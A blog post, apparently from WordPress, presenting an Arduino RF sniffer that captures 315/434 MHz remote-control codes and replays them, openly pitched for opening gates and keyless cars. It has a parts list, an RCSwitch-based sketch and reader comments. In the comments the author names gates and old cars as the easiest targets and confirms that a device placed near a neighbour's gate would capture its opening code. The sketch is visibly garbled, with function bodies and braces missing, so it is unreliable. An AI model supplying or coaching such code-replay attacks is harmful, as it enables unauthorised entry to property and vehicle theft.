RF Sniffer – open gates, cars, and RF remote controlled devices with ease.


The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.


TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a wave calculator for future reference.


The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kind of RF receivers out-there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.


Shopping List

Amount Part Type Properties
2 Inductor wire antenna
1 Red LED – 5mm package 5 mm [THT]; leg yes; color Red (633nm)
1 Arduino Uno (Rev3) type Arduino UNO (Rev3)
1 315Mhz RF-LINK_RX package rf-link_rx; part # WRL-10533
1 434Mhz RF-LINK_RX package rf-link_rx; part # WRL-10532
1 315Mhz RF-LINK_TX package rf-link_tx; part # WRL-10535
1 434Mhz RF-LINK_TX package rf-link_tx; part # WRL-10534



We connect both receivers/transmitters like the following:



And here is the Arduino code. Use at your own risk.

 * RF Sniffer (C) Elia Yehuda 2014
 * This program was coded.
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
        // print fast to console

        // 315 receiver on interrupt #0 (pin #2)
        // 315 transmitter on pin #4
        // how many resends
        // 434 receiver on interrupt #1 (pin #3)
        // 434 transmitter on pin #5
        // how many resends
        Serial.println("[+] Listening");

// simple decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
        static char b[33];
        b[32] = '\0';
        for ( int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        return b;

void process_rf_value(RCSwitch rfswitch, int rf)
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, true);
        value = rfswitch.getReceivedValue();
        if (value) {
                sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
        } else {
                sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);

        // resend the sniffed value (RESEND_SNIFFED_VALUES times)
        rfswitch.send(value, rfswitch.getReceivedBitlength());
        // reset the switch to allow more data to come
        // stop light to show end of transmission
        digitalWrite(LED_PIN, false);

void loop()

        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);

28 thoughts on “RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

    1. ofc.

      The hw scheme I provided is 100% same as the one I used in my testings. The sw part is a stripped-down code of my full project, but is enough to get one started.

      With a few modifications to the code, one can simply record the sniffed data instead of immediately resending it. Also, for useful results, when resending, a delay() should be considered for obvious reasons😉

      Most vulnerable targets I found are remote-controlled gates and old cars. Also weather stations seems to produce a lot of noise.

      Using same logic, one can add 816Mhz tx/rx to cover most widely used RF out there. and rule them all:)

  1. Awesome project. Can u give any details as to how you can save the codes it sniffs? I’m looking to do an automation project and this fits the bill.


  2. simple circuit, simple code – but not flying! receiver not seeing anything? i see chatter on other sites about a 1M resistor between data line and ground and a 330 Mfd cap and production changes on RX board pushing less power thru data line. no joy! any clues???

  3. Ziggy, Really like your project. I have the library, replicated the circuit and code – and quadrupled checked everything – but the receivers are never ‘available’. I have three 315 MHz devices to ‘sniff’ but with/without antennas, placing devices near/far from the antenna and even ordering/installing new RX / TX boards – has no impact on the results. Commenting out the .available test just yields the same data stream regardless of the device I test and, in fact , powering off the circuit has no impact on the data stream. Used SparkFun supplier.
    Please, any hints for me?

    1. I totally understand your frustration since it took me a while and some trial & error to get all to work as smoothly (eg, I too have looked into connecting a resistor to the data line…).

      I think you should first make sure your hw is 100% supported with this library; maybe you need to use a different lib/code to match your receiver – play with the code until you start getting some RAW (hex) data, then adjust it to your purpose.


  4. I have to reach our house by a shared drive with an electronic gate. The owner will not give the remote to copy. Is there any way I can buy a sniffer so that I can copy the opening code?
    I know nothing about electronics

      1. Thank you for that but it looks as though I have to get hold of my neighbours remote to work it. What I need is something I can leave in my garden so that when he uses his remote it will pick up the signal. Then I should be able to duplicate it with this sort of device you suggest

    1. Hello Roger,

      What your neighbor has done is illegal. You have the right to access your property and he cannot unreasonably deny you access. If his property is considered the dominant property, he has the right to put up a gate, but he must give you unrestricted access to it. This includes a key. It is illegal for him to tell you to wait for him to open the gate for you, as you may need access when he is not home.

      1. Thank you
        To a non-electrician it looks very complex to make a sniffer and I am trying to find someone in the UK to make the device. How close does it need to be to the gate to pick up the signal – or maybe it needs to be close to the remote being used?

      2. IIRC from my testings, the sniffer worked at a 10 meter distance, and obviously can be extended with better equipment.

        And I’m no electrician by any means:) Just start hacking around with Arduino, and you’ll find yourself playing with those [electronic] lego pieces in no time.

  5. I want to know does this sketch work with any modulation and encoding out of the box? For example does it simply sniff and transmit raw data? Kind of like hackrf_transfer using a raw iq/wav file to do a replay attack? Or does the library define some sort of encoding like ask ook

    Thank you

  6. Hi thanks for your tutorial !! just wondering if you could help me out ive got a arduino uno and a 433mhz receiver and transmitter im having trouble i can pick up signals from some remotes but not others ? but they are all 433mhz remotes and i see in alot of the tutorials people are using the 8 pin 433mhz receiver mines only the 4pin which from what i can tell is the cheap version by what it cost😄 and i see alot more people using the other ones could this be why im only picking up certain 433mhz signals from some remotes and not others ? sorry if its a dumb question ! still new to this

    1. good question, but i have to admit i never played with 8-pin receivers. maybe it’s encoding issue, distance, antenna – i would play with any of those vectors to test for any changes. Try to obtain an SDR (HackRF or alike) to watch your signals and debug it further😉

      1. Hello Z4ziggy

        I am going to try and find someone to make the sniffer for me but before I do can I clarify one thing.
        If I locate the device near the gate and activate it when he exits will it record the signal for me?
        If it does that is ideal if I can then transmit the signal to one of the RF duplicators that you advise I assume?

        many thanks


      2. Yep, the device should sniff the signal when located near the gate. And those duplicators already has the ‘record’ function in them, so they should work best for u.

  7. Im confused how do you start and end it? Where are the buttons? also I did this and I get an error for RCSswitch missing where do I put that is that code that is supposed to be added?

    1. there is no start/stop to the code provided – only endless sniffing & replaying routine, as a basic template example.
      regarding RCSwitch, consult your IDE docs how to install Arduino libraries (usually its extracting the zip in ~/Arduino/libraries/ folder).

  8. Hello z4ziggy, is there any chance to write in private?
    I connected all wires, but nothing is working. The LED is flashing for about 5 times the first time I connect the arduino to the PC. Then it stops. The serial monitor is showing nothing except + Listening.
    When connecting the LED to the breadboard -> the orange LED on the arduino illuminates with half of its power.
    I would appreciate your help. Thanks

    1. I doubt I can help much – you’ll have todo the debugging yourself.
      I suggest you start with connecting only 1 transmitter and getting it work 1st – it might take some playing with the code and the pins to get the correct layout, so don’t be discouraged – enjoy the path😉

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s